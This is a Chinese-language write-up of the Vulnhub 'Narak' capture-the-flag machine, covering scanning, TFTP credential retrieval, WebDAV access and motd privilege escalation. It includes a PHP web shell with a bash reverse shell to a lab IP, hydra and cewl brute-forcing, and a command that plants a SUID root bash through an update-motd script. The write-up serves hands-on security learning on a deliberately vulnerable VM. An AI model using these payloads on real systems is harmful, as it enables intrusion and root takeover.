Vulnhub narak
0x01:端口扫描
主机发现
nmap -sn 192.168.231.0/24
全端口扫描
nmap --min-rate 10000 -p- 192.168.231.143
22ssh,80http
UDP扫描
nmap -sU --top=20 192.168.231.143
有两个端口开放
详细端口扫描
nmap -sT -sC -sV -O --min-rate 10000 -p22,80 192.168.231.143
漏洞扫描
nmap --script=vuln -p22,80 192.168.231.143
0x02:tftp渗透
刚才我们扫描到UDP可能开放的端口为68,69
我们试试tftp
端口是否开放
成功进入
因为tftp
本身没有内建的列出文件功能,所以我们随便get一个东西看报错返回就能知道里面有什么文件了
看来他做了屏蔽
在下面的web渗透里从tips.txt
里得知了文件名为creds.txt
,我们get下来
拿到一串凭证yamdoot@Swarg
拿到凭证首先尝试ssh
0x03:web渗透
先扫目录
dirsearch -u http://192.168.231.143
gobuster dir -u http://192.168.231.143/ -x rar,zip,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
扫到一个/tips.txt
,看看
这提示我们了一个文件名为creds.txt
,应该就是tftp里的,把这一段放到上面去了
在/webdav
有一个登录框
用我们刚才tftp渗透拿到的凭证尝试登录
成功登录,但没有任何文件
上网查了查webdav
这个webapp的利用,我们可以使用davtest
查看webdav的基本信息,用cadaver
连接webdav
我们首先用davtest查看
davtest -url http://192.168.231.143/webdav/ -auth yamdoot:Swarg
发现可以执行php命令,现在我们连接webdav传马
注意,我们这里不能通过antsword连木马反弹shell,因为这个网站的此目录本身是无权访问的
cadaver http://192.168.231.143
<?php exec('/bin/bash -c "bash -i >& /dev/tcp/192.168.231.138/4444 0>&1"')
我们反弹shell
0x04:权限提升
提升tty
python -c "import pty; pty.spawn('/bin/bash')"
没有python,换成script
script /dev/null
查看用户
cat /etc/passwd
发现了3个用户
查看可写文件
find / -type f -writable ! -path "/proc/*" 2>/dev/null
看到了这几个可以文件,先看hell.sh
得到一串brianfuck,我们破解
怀疑是密码,我们试试
hydra -L user.txt -P pass.txt ssh://192.168.231.143
我们横向迁移
刚才我们查看可写文件看到了motd,怀疑是motd提权,先看它有没有root权限
好的,我们写马反弹root权限
0x05:反思总结
1.发现神的博客是用cewl生成字典去打的webdav
cewl 192.168.231.143 -w 1.txt
hydra -L 1.txt -P 1.txt 192.168.231.143 http-get /webdav
2.motd提权除了反弹rootshell之外,还可以将我们的bash替换成root的bash
echo "cp /bin/bash /home/inferno/bash && chmod u+s /home/inferno/bash" >> /etc/update-motd.d/00-header
./bash -p